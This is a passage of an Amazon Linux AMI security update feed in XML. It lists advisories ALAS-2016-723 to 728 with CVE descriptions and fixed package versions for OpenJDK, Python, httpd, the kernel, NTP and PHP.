arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.35-1.61.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-723</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-723: critical priority package update for java-1.8.0-openjdk</title><issued date="2016-07-20 18:00:00" /><updated date="2016-07-20 18:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3610:
1356994:
CVE-2016-3610 OpenJDK: insufficient value count check in MethodHandles.filterReturnValue() (Libraries, 8158571)
CVE-2016-3606:
1356963:
CVE-2016-3606 OpenJDK: insufficient bytecode verification (Hotspot, 8155981)
CVE-2016-3598:
1356971:
CVE-2016-3598 OpenJDK: incorrect handling of MethodHandles.dropArguments() argument (Libraries, 8155985)
CVE-2016-3587:
1356987:
CVE-2016-3587 OpenJDK: insufficient protection of MethodHandle.invokeBasic() (Hotspot, 8154475)
CVE-2016-3550:
1357506:
CVE-2016-3550 OpenJDK: integer overflows in bytecode streams (Hotspot, 8152479)
CVE-2016-3508:
1357015:
CVE-2016-3508 OpenJDK: missing entity replacement limits (JAXP, 8149962)
CVE-2016-3500:
1357008:
CVE-2016-3500 OpenJDK: maximum XML name limit not applied to namespace URIs (JAXP, 8148872)
CVE-2016-3458:
1357494:
CVE-2016-3458 OpenJDK: insufficient restrictions on the use of custom ValueHandler (CORBA, 8079718)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3458" title="" id="CVE-2016-3458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3500" title="" id="CVE-2016-3500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3508" title="" id="CVE-2016-3508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3550" title="" id="CVE-2016-3550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3587" title="" id="CVE-2016-3587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3598" title="" id="CVE-2016-3598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3606" title="" id="CVE-2016-3606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3610" title="" id="CVE-2016-3610" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-headless" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.101-3.b13.24.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-724</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-724: medium priority package update for python26 python27 python34</title><issued date="2016-07-20 18:00:00" /><updated date="2016-07-20 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5699:
It was found that Python&#039;s httplib library (used urllib, urllib2 and others) did not properly check HTTP header input in HTTPConnection.putheader(). An attacker could use this flow to inject additional headers in a Python application that allows user provided header name or values.
1303699:
CVE-2016-5699 python: http protocol steam injection attack
CVE-2016-5636:
A vulnerability was discovered in Python, in the built-in zipimporter. A specially crafted zip file placed in a module path such that it would be loaded by a later &quot;import&quot; statement could cause a heap overflow, leading to arbitrary code execution.
1345856:
CVE-2016-5636 python: Heap overflow in zipimporter module
CVE-2016-0772:
It was found that Python&#039;s smtplib library did not return an exception if StartTLS fails to establish correctly in the SMTP.starttls() function. An attacker with ability to launch an active man in the middle attack could strip out the STARTTLS command without generating an exception on the python SMTP client application, preventing the establishment of the TLS layer.
1303647:
CVE-2016-0772 python: smtplib StartTLS stripping attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0772" title="" id="CVE-2016-0772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5636" title="" id="CVE-2016-5636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5699" title="" id="CVE-2016-5699" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-libs" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.3-1.32.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.3-1.32.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.3-1.32.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.3-1.32.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.3-1.32.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.3-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-725</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-725: important priority package update for httpd24 httpd</title><issued date="2016-07-20 18:00:00" /><updated date="2016-07-20 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5387:
It was discovered that httpd used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.
1353755:
CVE-2016-5387 Apache HTTPD: sets environmental variable based on user supplied Proxy request header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5387" title="" id="CVE-2016-5387" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.23" release="1.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.23" release="1.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.23" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.23-1.65.amzn1.noarch.rpm</filename></package><package name="mod24_session" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.23" release="1.65.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.23" release="1.65.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.31" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.31" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.31" release="1.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.31" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.31-1.8.amzn1.noarch.rpm</filename></package><package name="httpd-tools" version="2.2.31" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.31" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.31" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.31-1.8.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.31" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.31-1.8.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.31" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.31-1.8.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.31" release="1.8.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.31-1.8.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.31" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.31-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-726</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-726: medium priority package update for kernel</title><issued date="2016-08-01 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5696:
net/ipv4/tcp_input.c in the Linux kernel before 4.7 does not properly determine the rate of challenge ACK segments, which makes it easier for man-in-the-middle attackers to hijack TCP sessions via a blind in-window attack.
1354708:
CVE-2016-5696 kernel: challenge ACK counter information disclosure.
CVE-2016-5244:
A vulnerability was found in the Linux kernel in function rds_inc_info_copy of file net/rds/recv.c. The last field &quot;flags&quot; of object &quot;minfo&quot; is not initialized. This can leak data previously at the flags location to userspace.
1343337:
CVE-2016-5244 kernel: Information leak in rds_inc_info_copy
CVE-2016-5243:
A leak of information was possible when issuing a netlink command of the stack memory area leading up to this function call. An attacker could use this to determine stack information for use in a later exploit.
1343335:
CVE-2016-5243 kernel: Information leak in tipc_nl_compat_link_dump
CVE-2016-4470:
A flaw was found in the Linux kernel&#039;s keyring handling code, where in key_reject_and_link() an uninitialised variable would eventually lead to arbitrary free address which could allow attacker to use a use-after-free style attack.
1341716:
CVE-2016-4470 kernel: Uninitialized variable in request_key handling causes kernel crash in error handling path
CVE-2016-1237:
It was found that nfsd is missing permissions check when setting ACL on files, this may allow a local users to gain access to any file by setting a crafted ACL.
1350845:
CVE-2016-1237 kernel: Missing check for permissions when setting ACL
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1237" title="" id="CVE-2016-1237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4470" title="" id="CVE-2016-4470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5243" title="" id="CVE-2016-5243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5244" title="" id="CVE-2016-5244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5696" title="" id="CVE-2016-5696" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.15" release="25.57.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.15-25.57.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-727</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-727: medium priority package update for ntp</title><issued date="2016-08-01 13:30:00" /><updated date="2017-01-04 14:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4956:
ntpd in NTP 4.x before 4.2.8p8 allows remote attackers to cause a denial of service (interleaved-mode transition and time change) via a spoofed broadcast packet. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-1548.
1340860:
CVE-2016-4956 ntp: broadcast interleave (incomplete fix for CVE-2016-1548)
CVE-2016-4955:
ntpd in NTP 4.x before 4.2.8p8, when autokey is enabled, allows remote attackers to cause a denial of service (peer-variable clearing and association outage) by sending (1) a spoofed crypto-NAK packet or (2) a packet with an incorrect MAC value at a certain time.
1340858:
CVE-2016-4955 ntp: autokey association reset
CVE-2016-4954:
The process_packet function in ntp_proto.c in ntpd in NTP 4.x before 4.2.8p8 allows remote attackers to cause a denial of service (peer-variable modification) by sending spoofed packets from many source IP addresses in a certain scenario, as demonstrated by triggering an incorrect leap indication.
1302225:
CVE-2016-4954 ntp: partial processing of spoofed packets
CVE-2015-8139:
1300654:
CVE-2015-8139 ntp: ntpq and ntpdc disclose origin timestamp to unauthenticated clients
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8139" title="" id="CVE-2015-8139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4954" title="" id="CVE-2016-4954" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4955" title="" id="CVE-2016-4955" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4956" title="" id="CVE-2016-4956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-41.32.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-41.32.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-41.32.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-41.32.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-41.32.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-41.32.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-41.32.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-41.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-728</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-728: medium priority package update for php55 php56</title><issued date="2016-08-01 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5773:
1351179:
CVE-2016-5773 php: ZipArchive class Use After Free Vulnerability in PHP's GC algorithm and unserialize
CVE-2016-5772:
1351175:
CVE-2016-5772 php: Double Free Corruption in wddx_deserialize
CVE-2016-5771:
1351173:
